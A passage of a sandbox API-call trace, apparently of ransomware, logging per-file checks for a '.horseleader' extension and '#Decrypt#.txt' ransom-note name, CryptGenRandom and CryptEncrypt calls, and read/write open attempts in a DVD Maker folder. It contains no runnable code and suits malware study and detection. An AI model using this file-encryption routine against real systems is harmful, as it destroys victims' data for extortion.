ftLastAccessTime.dwLowDateTime=0xaab67eab, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa15a10e8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.436] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.436] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\.") returned 58 [0251.436] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.436] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa12338ef, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab67eab, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa15a10e8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.436] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.436] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\..") returned 59 [0251.436] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.436] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.436] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72858c15, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72858c15, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xab3, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-background.png", cAlternateFileName="")) returned 1 [0251.436] lstrcmpiW (lpString1="16_9-frame-background.png", lpString2="Windows") returned -1 [0251.436] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png") returned 82 [0251.437] StrStrIW (lpFirst="16_9-frame-background.png", lpSrch=".horseleader") returned 0x0 [0251.437] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.437] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="_uninstalling_.png") returned 1 [0251.437] lstrlenW (lpString=".testttjffg") returned 11 [0251.437] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png", lpSrch=".testttjffg") returned 0x0 [0251.437] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.437] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.437] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.437] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72858c15, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72858c15, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8a3, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-highlight.png", cAlternateFileName="")) returned 1 [0251.437] lstrcmpiW (lpString1="16_9-frame-highlight.png", lpString2="Windows") returned -1 [0251.437] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png") returned 81 [0251.437] StrStrIW (lpFirst="16_9-frame-highlight.png", lpSrch=".horseleader") returned 0x0 [0251.437] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.438] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.438] lstrlenW (lpString=".testttjffg") returned 11 [0251.438] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.438] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.438] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.438] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.439] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7287ed72, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7287ed72, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49fbfaf1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x60f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-image-mask.png", cAlternateFileName="")) returned 1 [0251.439] lstrcmpiW (lpString1="16_9-frame-image-mask.png", lpString2="Windows") returned -1 [0251.439] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 82 [0251.439] StrStrIW (lpFirst="16_9-frame-image-mask.png", lpSrch=".horseleader") returned 0x0 [0251.439] lstrcmpW (lpString1="16_9-frame-image-mask.png", lpString2="#Decrypt#.txt") returned 1 [0251.439] lstrcmpW (lpString1="16_9-frame-image-mask.png", lpString2="_uninstalling_.png") returned 1 [0251.439] lstrlenW (lpString=".testttjffg") returned 11 [0251.439] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png", lpSrch=".testttjffg") returned 0x0 [0251.439] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.439] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.439] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-image-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.440] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72832ab8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72832ab8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49fbfaf1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4c15, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="babypink.png", cAlternateFileName="")) returned 1 [0251.440] lstrcmpiW (lpString1="babypink.png", lpString2="Windows") returned -1 [0251.440] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned 69 [0251.440] StrStrIW (lpFirst="babypink.png", lpSrch=".horseleader") returned 0x0 [0251.440] lstrcmpW (lpString1="babypink.png", lpString2="#Decrypt#.txt") returned 1 [0251.440] lstrcmpW (lpString1="babypink.png", lpString2="_uninstalling_.png") returned 1 [0251.440] lstrlenW (lpString=".testttjffg") returned 11 [0251.440] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png", lpSrch=".testttjffg") returned 0x0 [0251.440] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.440] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.440] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\babypink.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.440] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x728a4ecf, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x728a4ecf, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49fbfaf1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xcc1b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="background.png", cAlternateFileName="")) returned 1 [0251.440] lstrcmpiW (lpString1="background.png", lpString2="Windows") returned -1 [0251.441] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png") returned 71 [0251.441] StrStrIW (lpFirst="background.png", lpSrch=".horseleader") returned 0x0 [0251.441] lstrcmpW (lpString1="background.png", lpString2="#Decrypt#.txt") returned 1 [0251.441] lstrcmpW (lpString1="background.png", lpString2="_uninstalling_.png") returned 1 [0251.441] lstrlenW (lpString=".testttjffg") returned 11 [0251.441] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png", lpSrch=".testttjffg") returned 0x0 [0251.441] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.441] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.441] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.441] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x728cb02c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x728cb02c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49fe5c4f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2c432, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="bear_formatted_matte2.wmv", cAlternateFileName="")) returned 1 [0251.441] lstrcmpiW (lpString1="bear_formatted_matte2.wmv", lpString2="Windows") returned -1 [0251.441] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv") returned 82 [0251.441] StrStrIW (lpFirst="bear_formatted_matte2.wmv", lpSrch=".horseleader") returned 0x0 [0251.442] lstrcmpW (lpString1="bear_formatted_matte2.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.442] lstrcmpW (lpString1="bear_formatted_matte2.wmv", lpString2="_uninstalling_.png") returned 1 [0251.442] lstrlenW (lpString=".testttjffg") returned 11 [0251.442] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv", lpSrch=".testttjffg") returned 0x0 [0251.442] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.442] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.442] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.443] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x728f1189, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x728f1189, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a058069, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2c44a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Bear_Formatted_MATTE2_PAL.wmv", cAlternateFileName="")) returned 1 [0251.443] lstrcmpiW (lpString1="Bear_Formatted_MATTE2_PAL.wmv", lpString2="Windows") returned -1 [0251.443] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned 86 [0251.443] StrStrIW (lpFirst="Bear_Formatted_MATTE2_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.443] lstrcmpW (lpString1="Bear_Formatted_MATTE2_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.443] lstrcmpW (lpString1="Bear_Formatted_MATTE2_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.443] lstrlenW (lpString=".testttjffg") returned 11 [0251.443] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.443] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.443] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.444] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.444] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729172e6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729172e6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a351bc1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x39ef2, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="bear_formatted_rgb6.wmv", cAlternateFileName="")) returned 1 [0251.444] lstrcmpiW (lpString1="bear_formatted_rgb6.wmv", lpString2="Windows") returned -1 [0251.444] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv") returned 80 [0251.444] StrStrIW (lpFirst="bear_formatted_rgb6.wmv", lpSrch=".horseleader") returned 0x0 [0251.444] lstrcmpW (lpString1="bear_formatted_rgb6.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.444] lstrcmpW (lpString1="bear_formatted_rgb6.wmv", lpString2="_uninstalling_.png") returned 1 [0251.444] lstrlenW (lpString=".testttjffg") returned 11 [0251.444] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv", lpSrch=".testttjffg") returned 0x0 [0251.444] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.444] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.444] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.445] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729635a0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729635a0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a377d1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x41c0a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Bear_Formatted_RGB6_PAL.wmv", cAlternateFileName="")) returned 1 [0251.445] lstrcmpiW (lpString1="Bear_Formatted_RGB6_PAL.wmv", lpString2="Windows") returned -1 [0251.445] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned 84 [0251.445] StrStrIW (lpFirst="Bear_Formatted_RGB6_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.445] lstrcmpW (lpString1="Bear_Formatted_RGB6_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.445] lstrcmpW (lpString1="Bear_Formatted_RGB6_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.445] lstrlenW (lpString=".testttjffg") returned 11 [0251.445] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.445] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.445] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.445] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.445] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729af85a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729af85a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a377d1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdc5, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-back-static.png", cAlternateFileName="")) returned 1 [0251.445] lstrcmpiW (lpString1="btn-back-static.png", lpString2="Windows") returned -1 [0251.446] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned 76 [0251.446] StrStrIW (lpFirst="btn-back-static.png", lpSrch=".horseleader") returned 0x0 [0251.446] lstrcmpW (lpString1="btn-back-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.446] lstrcmpW (lpString1="btn-back-static.png", lpString2="_uninstalling_.png") returned 1 [0251.446] lstrlenW (lpString=".testttjffg") returned 11 [0251.446] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png", lpSrch=".testttjffg") returned 0x0 [0251.446] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.446] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.446] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.447] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729af85a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729af85a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a377d1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdfc, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-next-static.png", cAlternateFileName="")) returned 1 [0251.447] lstrcmpiW (lpString1="btn-next-static.png", lpString2="Windows") returned -1 [0251.447] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png") returned 76 [0251.447] StrStrIW (lpFirst="btn-next-static.png", lpSrch=".horseleader") returned 0x0 [0251.447] lstrcmpW (lpString1="btn-next-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.447] lstrcmpW (lpString1="btn-next-static.png", lpString2="_uninstalling_.png") returned 1 [0251.448] lstrlenW (lpString=".testttjffg") returned 11 [0251.448] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png", lpSrch=".testttjffg") returned 0x0 [0251.448] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.448] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.448] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.448] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729d59b7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729d59b7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a377d1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xe0b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-previous-static.png", cAlternateFileName="")) returned 1 [0251.448] lstrcmpiW (lpString1="btn-previous-static.png", lpString2="Windows") returned -1 [0251.448] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned 80 [0251.448] StrStrIW (lpFirst="btn-previous-static.png", lpSrch=".horseleader") returned 0x0 [0251.448] lstrcmpW (lpString1="btn-previous-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.448] lstrcmpW (lpString1="btn-previous-static.png", lpString2="_uninstalling_.png") returned 1 [0251.448] lstrlenW (lpString=".testttjffg") returned 11 [0251.448] StrStrW 